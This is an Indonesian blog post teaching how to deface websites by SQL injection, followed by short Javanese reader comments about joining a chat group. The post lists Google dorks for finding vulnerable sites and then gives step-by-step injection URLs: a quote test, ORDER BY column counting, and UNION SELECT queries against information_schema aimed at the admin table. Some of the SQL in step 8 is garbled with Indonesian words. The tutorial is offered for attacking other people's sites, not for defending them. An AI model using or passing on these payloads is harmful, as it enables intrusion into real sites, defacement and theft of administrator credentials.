Assalamuallaikum Wr.Wb
Selamat datang di blog pribadi saya yang sederhana ini hehehehe :D, Kali ini saya akan share tutorial deface dengan sql injection, apa itu sql injection? SQL Injection adalah teknik hacking yang ditujukan untuk menyerang database SQL server. yahh tanpa basa basi lagi kita mulai. pertama download hackbar for mozilla firefox, jika sudah lalu lanjut ke langkah berikutnya.1. Menemukan kerentanan di situs SQL injection
Dorking :
- inurl:? index.php id =
- inurl:? admin.php id =
( KEMBANGIN LAGI DORKNYA CARANYA CARI DI GOOGLE )
copy dan paste salah satu script di Google seperti inurl:/ id = index.php
2. Pilih salah Satu Web
Contoh => www.target.com/index.php?id=1
3. Sekarang Anda harus menambahkan ( ') pada akhir URL
contoh => www.target.com/index.php?id=1 '
jika Anda mendapatkan error seperti You have an error in your SQL syntax.You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1 berarti web itu rentan terhadap Sqli.
4. Sekarang kita harus mencari jumlah kolom
www.target.com/index.php?id=1 order by 10-- (ERROR)
www.target.com/index.php?id=1 order by 9-- (ERROR)
www.target.com/index.php?id=1 order by 8-- (ERROR)
www.target.com/index.php?id=1 order by 7-- (NO ERROR)
jumlah kolom 7 tidak menunjukkan acara apapun sehingga kita dapat dengan mudah mengatakan jumlah kolom 7
5. Sekarang kita harus menemukan kolom rentan
www.target.com/index.php?id=-1 union select 1,2,3,4,5,6,7--
jika menunjukkan angka 2 kolom maka rentan adalah 2
6. kita harus menemukan versi database
www.target.com/index.php?id-=1 union select 1,@@version,3,4,5,6,7--
Mengganti kolom rentan dengan "@@ version"
jika menunjukkan versi 5.1 log maka untuk bisa melanjutkan ke langkah berikutnya
7.Sekarang menemukan nama database
www.target.com/index.php?id=-1 union select 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema=database()–-
8. Sekarang kita harus mencari nama kolom
union www.target.com/index.php?id=1 pilih 1, concat (column_name), 3,4,5,6,7 dari information_schema.columns where table_name=–-dan di ikuti hasil convert MySQL CHAR() nah disini keuntungan dari kita memakai HACKBARyaitu kita tidak perlu mencari converter MySQL CHAR() ke web-web lain karena hackbar sudah menyediakanya letaknya:
klik tombol SQL –> MySQL –> MySQL CHAR()
setelah itu akan muncul javaScript Aplication sebagai berikut: kita copas ( copy paste ) nama kolom yang berada dalam table yang kita curigai sebagai tempat tersimpanya user pass admin contoh tadi kita menemukan table admin jadi kita copas ( copy paste ) admin kedalam javaScript Aplication tersebut setelah itu kliksehingga perintah menjadi:
www.target.com/index.php?id-=1 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)–
Setelah itu tekan Execute
Nah sekian tutorial dari saya kurang lebihnya mohon maaf :)

Sek2 Ki koe Kabeh seng gawe..?!
BalasHapusIyoo
HapusYo kang podo
BalasHapusGabung grup jateng bro
BalasHapusAku pengen dadi siji
Kene lur melbu grub wa ku
HapusJoin grub nya dong gan
BalasHapusMelu bro
BalasHapus